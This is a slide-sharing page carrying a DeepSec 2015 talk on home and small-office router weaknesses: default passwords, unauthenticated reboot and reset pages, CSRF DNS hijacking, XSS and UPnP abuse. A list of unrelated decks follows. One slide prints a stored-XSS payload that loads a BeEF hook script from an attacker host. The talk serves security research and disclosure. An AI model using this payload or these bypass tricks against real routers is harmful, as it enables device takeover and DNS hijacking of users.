revisiting soho router
play

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet - PowerPoint PPT Presentation

Mar 22, 2023 •309 likes •1.03k views

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro Folgado Rueda Independent Researcher Jos Antonio Rodrguez Garca Independent Researcher Ivn Sanz de Castro Security Analyst at Wise Security

  1. Revisiting SOHO Router Attacks DeepSec 2015

  2. About us.. ... Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global . Revisiting SOHO Router Attacks · DeepSec 2015 2

  3. Main goals Search for Explore innovative vulnerability issues attack vectors Evaluate the current security level of routers Develop exploiting Build an audit tools methodology Revisiting SOHO Router Attacks · DeepSec 2015 3

  4. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  5. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  6. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  7. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  8. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  9. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  10. State of the art • Real world attacks Revisiting SOHO Router Attacks · DeepSec 2015 5

  11. Common security problems • Services • Too many. Mostly useless. • Increases attack surfaces • Insecure Revisiting SOHO Router Attacks · DeepSec 2015 6

  12. Common security problems • Default credentials • Public and well-known for each model • Non randomly generated • Hardly ever modified by users Use ser / / Pas assword 18% 1234 / 1234 5% admin / admin 45% 5% [blank] / admin admin / password 27% vodafone / vodafone Revisiting SOHO Router Attacks · DeepSec 2015 7

  13. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Revisiting SOHO Router Attacks · DeepSec 2015 8

  14. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Revisiting SOHO Router Attacks · DeepSec 2015 8

  15. Bypass Authentication • Allows unauthenticated attackers to carry out router configuration changes • Locally and remotely • Exploits: • Improper file permissions • Service misconfiguration Revisiting SOHO Router Attacks · DeepSec 2015 9

  16. Bypass Authentication • Web configuration interface • Permanent Denial of Service • By accessing /rebootinfo.cgi • Reset to default configuration settings • By accessing /restoreinfo.cgi • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done! Vid ideo Demo #1 • Persistent Denial of Service without requiring authentication Revisiting SOHO Router Attacks · DeepSec 2015 10

  17. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Revisiting SOHO Router Attacks · DeepSec 2015 11

  18. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Revisiting SOHO Router Attacks · DeepSec 2015 11

  19. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Revisiting SOHO Router Attacks · DeepSec 2015 12

  20. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Revisiting SOHO Router Attacks · DeepSec 2015 12

  21. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  22. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  23. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  24. Cross Site Request Forgery ry • Suspicious link, isn't it? • URL Shortening Services • Create a malicious website Revisiting SOHO Router Attacks · DeepSec 2015 14

  25. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Revisiting SOHO Router Attacks · DeepSec 2015 15

  26. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Revisiting SOHO Router Attacks · DeepSec 2015 16

  27. Unauthenticated Cross Site Scripting • Script code injection is performed locally without requiring any login process • Send a DHCP Request PDU containing the malicious script within the hostname parameter • The malicious script is injected within Connected Clients (DHCP Leases) table Revisiting SOHO Router Attacks · DeepSec 2015 17

  28. Unauthenticated Cross Site Scripting Revisiting SOHO Router Attacks · DeepSec 2015 18

  29. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Revisiting SOHO Router Attacks · DeepSec 2015 19

  30. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Revisiting SOHO Router Attacks · DeepSec 2015 19

  31. Unauthenticated Cross Site Scripting • Or even next level... • But it works! Revisiting SOHO Router Attacks · DeepSec 2015 20

  32. Privilege Escalation • User without administrator rights is able to escalate privileges and become an administrator • Shows why multiple user accounts are unsafe Vid ideo Demo #2 • Privilege Escalation via FTP Revisiting SOHO Router Attacks · DeepSec 2015 21

  33. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Revisiting SOHO Router Attacks · DeepSec 2015 22

  34. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Revisiting SOHO Router Attacks · DeepSec 2015 22

  35. In Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Revisiting SOHO Router Attacks · DeepSec 2015 23

  36. In Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Revisiting SOHO Router Attacks · DeepSec 2015 23

  37. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  38. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  39. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  40. Universal Plug and Play • Enabled by default on several router models • Allows application to execute network configuration changes such as opening ports • Extremely insecure protocol • Lack of an authentication process • Awful implementations • Goals • Open critical ports for remote WAN hosts • Persistent Denial of Service • Carry out other configuration changes Revisiting SOHO Router Attacks · DeepSec 2015 25

  41. Universal Plug and Play • Locally • Miranda UPnP tool Revisiting SOHO Router Attacks · DeepSec 2015 26

  42. Universal Plug and Play Revisiting SOHO Router Attacks · DeepSec 2015 27

  43. Universal Plug and Play Revisiting SOHO Router Attacks · DeepSec 2015 27

  44. Universal Plug and Play • Remotely • Malicious SWF file Revisiting SOHO Router Attacks · DeepSec 2015 28

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r www.vantagepoint.sg | office@vantagepoint.sg Hi everyone my name is Lyon Yang I hack IoT and embedded systems. I live in sunny Singapore. Spoke @

846 views • 47 slides
SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS

SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS

SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS CONDOMINIUMS CONDOMINIUMS A STUDY OF LIGHTWEIGHT A STUDY OF LIGHTWEIGH T CONCRET CONCRETE CO CONSTRUCTION NSTRUCTION JOSEPH MUGFORD

687 views • 34 slides
KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the existing Victorian style architecture surroundings offers a charming and trendy atmosphere that is unique and beloved by many. King West has been

326 views • 3 slides
Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms

Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms

Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms Tr Transaction Overview Pr Pro F Forma Ca Capitalisation PureGym completed the acquisition of Soho Gyms on 22 Capital Capi alisat ation

292 views • 4 slides
CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC

CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC

CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC CNC stands for Computer Numeric Controlled (Router) Very Expensive Can only be used with proper training Trumans favorite

534 views • 7 slides
Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680

Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680

Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680 Market Opportunity SOHO (Small Office / Home Office) Market Opportunity 12,717 businesses have &gt;500 employees 556,988 businesses have 20

120 views • 11 slides
Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15

Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15

Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15 Rev. 1 http://www.eunil.com PCB Router / Depanel machine : Off-Line ETR-400 This machine is used to separate the main panel PCB and the arrayed

131 views • 9 slides
BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb

BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb

BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb olivier@cochard.me Agenda Why a x86 software router ? Project Targets NanoBSD: FreeBSD for appliance BSDRP feature list

561 views • 32 slides
Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for

Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for

Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for Provider-Independent Addressing 300 K number of number of r routing ta outing table entries ble entries 250 K 200 K 150 K 100 K Geoff Huston: CIDR Report 50 K

171 views • 15 slides
Security AutoSecure Router HardeningAutomagically The process of turning off unnecessary

Security AutoSecure Router HardeningAutomagically The process of turning off unnecessary

Security AutoSecure Router HardeningAutomagically The process of turning off unnecessary services is called hardening a router to prevent attacks or exploits. The basic steps of router hardening are: 1) Administratively shut down

102 views • 8 slides
200 Lafayette Street - Existing Conditions May 2017 Landmarks Preservation Commission Sheet 1

200 Lafayette Street - Existing Conditions May 2017 Landmarks Preservation Commission Sheet 1

SoHo-Cast Iron Historic District Extension N o H o H i s t o r i c SoHo-Cast Iron D i s t r i c t Historic District Extension 9 2 M a c D o u g a l - S u l l i v a n 2 1 8 Borough of Manhattan, NY W H

339 views • 12 slides
An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router An Enhanced Global

An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router An Enhanced Global

An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router With Consideration of With Consideration of General Layer Directives General Layer Directives Hsien Lee 1 , Yen Jung Chang 1 , and Ting

365 views • 33 slides
OSPF Router Types OSPF Router Types There are four types of OSPF routers. Router types are

OSPF Router Types OSPF Router Types There are four types of OSPF routers. Router types are

OSPF Router Types OSPF Router Types There are four types of OSPF routers. Router types are determined by a routers function and/or location within an OSPF area: Internal (IR) all (OSPF?)* interfaces must belong to the same OSPF area.

241 views • 10 slides
Scaling Databases with DBIx::Router Perrin Harkins We Also Walk Dogs What is DBIx::Router?

Scaling Databases with DBIx::Router Perrin Harkins We Also Walk Dogs What is DBIx::Router?

Scaling Databases with DBIx::Router Perrin Harkins We Also Walk Dogs What is DBIx::Router? Load-balancing Failover Sharding Transparent (Mostly.) Why would you need this? Web and app servers are easy to scale Just add another dozen boxes

489 views • 33 slides
Regaining sovereignty over your router Lucas Lasota | Legal Team lucas.lasota@fsfe.org What is

Regaining sovereignty over your router Lucas Lasota | Legal Team lucas.lasota@fsfe.org What is

Regaining sovereignty over your router Lucas Lasota | Legal Team lucas.lasota@fsfe.org What is it all about? 1. Why Router Freedom is important? 2. Router Freedoms panorama in Europe 3. How to make a stand for Router Freedom 2 Why

254 views • 9 slides
Online Security Michael Hutchinson My First line of Defense Making Things Secure Router

Online Security Michael Hutchinson My First line of Defense Making Things Secure Router

Online Security Michael Hutchinson My First line of Defense Making Things Secure Router Security Anti-Malware Programs Browser Security Internet Searching Router Security Router is First Line of Defense Router typically

472 views • 23 slides
Bonus slides Confused Deputy Problem Original exam ple Norm al output file Request: 1. Do

Bonus slides Confused Deputy Problem Original exam ple Norm al output file Request: 1. Do

Bonus slides Confused Deputy Problem Original exam ple Norm al output file Request: 1. Do action 2. Write results to Im portant server file Client Server Response: OK Im portant server file Original exam ple ( 2 )

237 views • 8 slides
Secure Programming Laboratory 4: Web Attack SP Demonstrators: Arthur Chan / David Aspinall 20th

Secure Programming Laboratory 4: Web Attack SP Demonstrators: Arthur Chan / David Aspinall 20th

Secure Programming Laboratory 4: Web Attack SP Demonstrators: Arthur Chan / David Aspinall 20th March 2019 Orientation This is the fourth Laboratory Session for Secure Programming It is convened by Arthur and David. The handout and other

441 views • 8 slides
Web (In)Security: Remediation Efforts - Status and Outlook Jeff Hodges Andy Steingruebl PayPal

Web (In)Security: Remediation Efforts - Status and Outlook Jeff Hodges Andy Steingruebl PayPal

Web (In)Security: Remediation Efforts - Status and Outlook Jeff Hodges Andy Steingruebl PayPal February 2011 Overall Agenda The Current Web Has Some Holes Help is On The Way (Some Anyway) Solving Real World Problems Still A Ways To Go 2

971 views • 39 slides
iLab2 WWW and Application Layer Security with friendly support by P. Laskov, Ph.D., University

iLab2 WWW and Application Layer Security with friendly support by P. Laskov, Ph.D., University

Chair for Network Architectures and Services Department of Informatics TU Mnchen Prof. Carle iLab2 WWW and Application Layer Security with friendly support by P. Laskov, Ph.D., University of Tbingen Recap: Internet Protocol Suite

755 views • 41 slides
User Input Attacks CPSC 328 Spring 2009 Review Abstract lower level security Provide

User Input Attacks CPSC 328 Spring 2009 Review Abstract lower level security Provide

User Input Attacks CPSC 328 Spring 2009 Review Abstract lower level security Provide end-to-end security User security info to server WS Security XML Encryption XML Signature Tokens

221 views • 6 slides
Database-enabled web technology Security Instructor: C a gr C oltekin

Database-enabled web technology Security Instructor: C a gr C oltekin

Database-enabled web technology Security Instructor: C a gr C oltekin c.coltekin@rug.nl Information science/Informatiekunde Fall 2011/12 Security in Web applications Web, Databases &amp; Security http://xkcd.com/327/ C . C

952 views • 47 slides
Symbolic String Verification: An Automata-based Approach Fang Yu Tevfik Bultan Marco Cova

Symbolic String Verification: An Automata-based Approach Fang Yu Tevfik Bultan Marco Cova

Outline Motivation Symbolic String Verification Experiments Conclusion Symbolic String Verification: An Automata-based Approach Fang Yu Tevfik Bultan Marco Cova Oscar H. Ibarra Dept. of Computer Science University of California Santa

465 views • 35 slides
UMBC A B M A L T F O U M B C I M Y O R T 1 (4/4/06) I E S R C E O V U

UMBC A B M A L T F O U M B C I M Y O R T 1 (4/4/06) I E S R C E O V U

Digital Systems Crosstalk I CMPE 650 Crosstalk Ground and power planes serve to: Provide stable reference voltages Distribute power to logic devices Control crosstalk Here, we derive formulas for computing crosstalk and show how

607 views • 18 slides

More recommend